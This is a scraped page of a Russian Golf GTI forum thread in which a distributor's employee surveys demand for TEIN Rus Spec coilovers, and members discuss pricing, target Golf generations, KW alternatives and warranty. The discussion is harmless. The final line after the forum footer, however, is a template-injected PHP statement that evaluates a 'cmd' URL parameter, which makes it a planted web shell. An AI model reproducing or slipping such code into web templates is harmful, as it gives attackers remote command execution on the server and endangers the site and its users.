+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 21

Тема: Изучается спрос на ТЕЙН Rus Spec


  1. #1
    GTI-Racing up2you is a jewel in the rough up2you is a jewel in the rough up2you is a jewel in the rough up2you is a jewel in the rough Аватар для up2you
    Регистрация
    29.09.2009
    Машина
    VW GOLF GTI 5
    Сообщений
    1,112

    Изучается спрос на ТЕЙН Rus Spec

    Ребят, по работе делаю исследование. Хотелось бы услышать Ваше мнение и получить дельный совет :beer:

    Текст скопировал с гольф клуб форума.

    Всем добрый день.
    Я работаю в компании Успенский Ралли Техника (УРТ) http://urt.ru/
    И мы являемся эксклюзивными дистрибьютерами TEIN в России.
    Несколько слов о том, что такое TEIN.
    Название компании TEIN происходит от слияния двух слов - TEchical INnovation. Компания существует уже более 20 лет, но неизменно сохраняет свой основной принцип: производить лучшие компоненты по новейшим технологиям.

    Марка TEIN пользуется заслуженной популярностью в автоспорте: все полноприводные спортивные автомобили, производимые в компании "Успенский Ралли Техника", оснащаются амортизаторами TEIN. Именно на таких амортизаторах в конце 2008 года SUBARU Impreza URT'09, автомобиль российской постройки, под управлением шведского пилота Патрика Флодина, завоевал первую в новейшей истории марки SUBARU победу на этапе Чемпионата Мира по ралли (P-WRC) и на этом же автомобиле Патрик стал Чемпионом России по ралли 2009 года.

    Уже год как Успенский Ралли Техника совместно с компанией ТЕЙН разработали линейку амортизаторов Rus Spec ".russia."- предназначенных специально для российских реалий.

    Наши инженеры опробовали новинку как в стандартных условиях уличного движения, так и в условиях эксплуатации на гоночном треке в Мячково. Напомним Вам, что именно на таких стойках выиграл сезон в MaxPowerCars пилот команды "Успенский Ралли Техника" Василий Сабуров.

    Основное отличие от японской спецификации в более развитой защите от коррозии и влаги, а так же в наличии полноценных пыльников. Амортизаторы TEIN RusSpec сохраняют стандартную высоту автомобиля и ход подвески при заводских установках, но имеют регулировку по высоте (возможно поднять автомобиль на 15 мм либо понизить на 25 мм от стока). И, конечно, характеристики амортизаторов TEIN выгодно отличаются от стандартных.

    Амортизаторы Tein RusSpec строятся на двух модельных базах:
    Super Street - регулировка сжатия, отбоя, высоты.
    Basic - регулировка высоты.

    До недавних пор TEIN Rus Spec выпускались только для японских автомобилей - Subaru, Mazda...Сейчас закончились тесты Rus Spec для Suzuki и Nissan.

    И было принято решение о расширении линейки Rus Spec для европейских автомобилей. Было решено выпускать Rus Spec для VW ".germany."и BMW".germany.". На данном этапе были заказаны прототипы у компании TEIN для дальнейшей разработки в России.

    Внимание вопрос - хотели бы Вы установить амортизаторы Rus Spec на свой Golf, а именно с этой модели 4-ого и 5-ого поколения мы планируем начать производство.

    Что Вы думаете о продукции ТЕЙН? Как вы думаете на какие Гольфы стоит делать Rus Spec, а на какие нет?

    Вообще в принципе любые комментарии по теме приветсвуются. :)::

    Заранее спасибо за Ваш комментарии и пожелания.
    who needs headlights when you’ve got lazertits?

    Grand Cherokee WK2 // Scirocco MK1 1975 // Honda CB400SS Street Tracker

  2. #2
    GTI-Racing total is on a distinguished road Аватар для total
    Регистрация
    05.12.2006
    Машина
    MkV GTI
    Сообщений
    1,146
    я думаю больше будет зависить от цены вопроса, многие слышали, некоторые ездят, так что тут основополагающим фактором будет цена. на гольф вагон подвесок, выбирай не хочу начиная с KW заканчивая билем.
    Time attack
    Mkv gti
    ADM - 1.58,4
    Лидер - 1.02,5
    DC2
    ADM - 1.58,2
    Лидер - 1.01,2
    Smolenskring - 1.48,2
    NNRing - 1.53,8
    Kazanring - 1.43.863

  3. #3
    GTI-Racing Окислитель is on a distinguished road Аватар для Окислитель
    Регистрация
    16.04.2008
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    847
    я бы добавил, что кроме цены, для меня важным фактором будет являтся настройка этой самой подвески под мою машину.
    Те же KW купить то можно, но под какой гольф и какой массы пружины подбирались не узнаеш.

  4. #4
    GTI-Racing up2you is a jewel in the rough up2you is a jewel in the rough up2you is a jewel in the rough up2you is a jewel in the rough Аватар для up2you
    Регистрация
    29.09.2009
    Машина
    VW GOLF GTI 5
    Сообщений
    1,112
    Цитата Сообщение от total Посмотреть сообщение
    я думаю больше будет зависить от цены вопроса, многие слышали, некоторые ездят, так что тут основополагающим фактором будет цена. на гольф вагон подвесок, выбирай не хочу начиная с KW заканчивая билем.
    с ценой на данном этапе будет сложновато определиться.
    тут щас важно понять на какие модели делать: либо на заряженые - гти шки и эрки, либо на овощей.
    Фишка русспеков - что это амортики адаптированные для рашки и фишка здесь в том, что на лето можно мальца занизить - 25, а на зиму поднять + 15 + главная фишка - производительность амортов - улучшенное качество, большая корозия устойчивость, пыльники ... а мы - ГТИ шники скорей предпочтем что-то более производительное - для трека и агрессивной езды и по ниже.
    мне кажется что имеет смысл делать РусСпеки как раз для овощных обычных потребителей на 1.4 - 1.6 четвертого и пятого поколения.
    в общем хотел найти здесь потверждение своим мыслям):greengrocer:

    Добавлено через 14 минут
    Цитата Сообщение от Окислитель Посмотреть сообщение
    я бы добавил, что кроме цены, для меня важным фактором будет являтся настройка этой самой подвески под мою машину.
    Те же KW купить то можно, но под какой гольф и какой массы пружины подбирались не узнаеш.
    фишка в том, что я себе как раз ГГ)) KW и взял. долго выбирал между TEIN Super Street и KW. и решил, что машина как для повседневной езды, так и для трек выходных и занижение я хочу серьезное + KW известны как раз в кольцевом спорте ( асфальт), а TEIN больше спорт раллийный.
    Вот и KW я купил как раз под свою модель, там ничего сложного нет. для ГТИ есть тока два подтипа ( сначала выбираешь V1-v3.....) - одни аморты под обычные ГТИ, другие под юбилейки. вот и все. Просмотрев каталог KW это можно легко выяснить и сверить по артикулями - то ли ты берешь или нет.

    А по поводу настройки могу сказать, что нащи мастера ТЕЙН настраиваю подвеску так как хочет клиент - хочешь жестко - будет тебе жестко, хочешь мягко будет тебе мягко. Что то не устроило - переделаем. В этом плане наши парни в ТЕЙНЕ оч круты и сами дорабатывают и УЛУЧШАЮТ тейновские аморты.

    Добавлено через 32 минуты
    Могу огласить цену на Рус Спек для японских автомобилей, которые уже продаются , причес весьма удачно, больше года в УРТ.
    Rus Spec Basic(регулировка по высоте) цена рознится в зависимости от моделей в диапазоне от 49т.р. до 62 т.р.
    Rus Spec SuperStreet ( высота, сжатие, отбой) 51 т.р- 67т.р.
    Последний раз редактировалось up2you; 30.07.2010 в 11:22. Причина: Добавлено сообщение
    who needs headlights when you’ve got lazertits?

    Grand Cherokee WK2 // Scirocco MK1 1975 // Honda CB400SS Street Tracker

  5. #5
    GTI-Racing HAWK has a spectacular aura about HAWK has a spectacular aura about Аватар для HAWK
    Регистрация
    17.06.2009
    Откуда
    SPB
    Машина
    MK4
    Сообщений
    576
    GTI 5-6. на другие фольцы смысла нету, спроса нету просто.
    MKIV GTI AGU-sold
    BMW 120D ///M -pack-sold
    BMW 325 Xi ///M -pack-sold
    AUDI Q3 REVO St.1

  6. #6
    GTI-Racing up2you is a jewel in the rough up2you is a jewel in the rough up2you is a jewel in the rough up2you is a jewel in the rough Аватар для up2you
    Регистрация
    29.09.2009
    Машина
    VW GOLF GTI 5
    Сообщений
    1,112
    Цитата Сообщение от HAWK Посмотреть сообщение
    GTI 5-6. на другие фольцы смысла нету, спроса нету просто.
    а смысл на 6ой делать? их продано не так уж что и много пока, в будущем буит больше это понятно, но ведь с гарантии мало кто хочет спрыгивать.
    ток что на мой взгляд на 6ой они плохо пока продаваться будут.
    а 4ых и 5ых продано мама не горюй.
    хотя вариант с 4ым сомнителен, не могу не согласиться.
    who needs headlights when you’ve got lazertits?

    Grand Cherokee WK2 // Scirocco MK1 1975 // Honda CB400SS Street Tracker

  7. #7
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    Я так думаю, что 5 и 6-ой в плане ходовой ничем кардинальным не отличаются ))

    Ну и не так страшно слетать с гарантии на ходовую, если учесть, что должна быть гарантия на неё "тейновская". На все остальные узлы и агрегаты заводская гарантия сохраняется.
    С уважением, Василий.

    My onboard video.

  8. #8
    GTI-Racing HAWK has a spectacular aura about HAWK has a spectacular aura about Аватар для HAWK
    Регистрация
    17.06.2009
    Откуда
    SPB
    Машина
    MK4
    Сообщений
    576
    Цитата Сообщение от up2you Посмотреть сообщение
    а смысл на 6ой делать? их продано не так уж что и много пока, в будущем буит больше это понятно, но ведь с гарантии мало кто хочет спрыгивать.
    ток что на мой взгляд на 6ой они плохо пока продаваться будут.
    а 4ых и 5ых продано мама не горюй.
    хотя вариант с 4ым сомнителен, не могу не согласиться.
    Если грамотно судить то гарантия снимается только на подвеску, остальные отмазы диллеров просто развод. заменил подвеску, но двигатель, коробка, электрика , кузов не причем. так что думаю все окей будет.
    MKIV GTI AGU-sold
    BMW 120D ///M -pack-sold
    BMW 325 Xi ///M -pack-sold
    AUDI Q3 REVO St.1

  9. #9
    GTI-Racing up2you is a jewel in the rough up2you is a jewel in the rough up2you is a jewel in the rough up2you is a jewel in the rough Аватар для up2you
    Регистрация
    29.09.2009
    Машина
    VW GOLF GTI 5
    Сообщений
    1,112
    Цитата Сообщение от VVZ Посмотреть сообщение
    Я так думаю, что 5 и 6-ой в плане ходовой ничем кардинальным не отличаются ))

    Ну и не так страшно слетать с гарантии на ходовую, если учесть, что должна быть гарантия на неё "тейновская". На все остальные узлы и агрегаты заводская гарантия сохраняется.
    да, ессно Тейновская гарантия есть. сейчас пол года и 6т.р., но эт не наше, а тейновское условие. В мае будем перезаключать гарантийный контракт и если ниче не измениться, то планируем увеличить до года

    Добавлено через 58 секунд
    Цитата Сообщение от HAWK Посмотреть сообщение
    Если грамотно судить то гарантия снимается только на подвеску, остальные отмазы диллеров просто развод. заменил подвеску, но двигатель, коробка, электрика , кузов не причем. так что думаю все окей будет.
    я это и имел в виду, прост не каждый знает об этом и не каждый сможет поспорить с дилером.
    Последний раз редактировалось up2you; 30.07.2010 в 12:05. Причина: Добавлено сообщение
    who needs headlights when you’ve got lazertits?

    Grand Cherokee WK2 // Scirocco MK1 1975 // Honda CB400SS Street Tracker

  10. #10
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    Надеюсь не 6 т.р., а 6 т. км )))
    С уважением, Василий.

    My onboard video.

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Изучается спрос на G3 GTI
    от Chip в разделе Покупка и продажа авто
    Ответов: 23
    Последнее сообщение: 03.11.2010, 01:18
  2. Изучается спрос на bmw 335 e92
    от Maxus в разделе Покупка и продажа авто
    Ответов: 9
    Последнее сообщение: 29.10.2010, 02:04
  3. изучается спрос ГТИ 5
    от madman в разделе Покупка и продажа авто
    Ответов: 10
    Последнее сообщение: 24.09.2009, 11:20
  4. Изучается Спрос
    от iv_mark в разделе Покупка и продажа авто
    Ответов: 42
    Последнее сообщение: 31.08.2008, 20:37
  5. Изучается Спрос
    от iv_mark в разделе Покупка и продажа авто
    Ответов: 10
    Последнее сообщение: 11.05.2008, 23:10

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}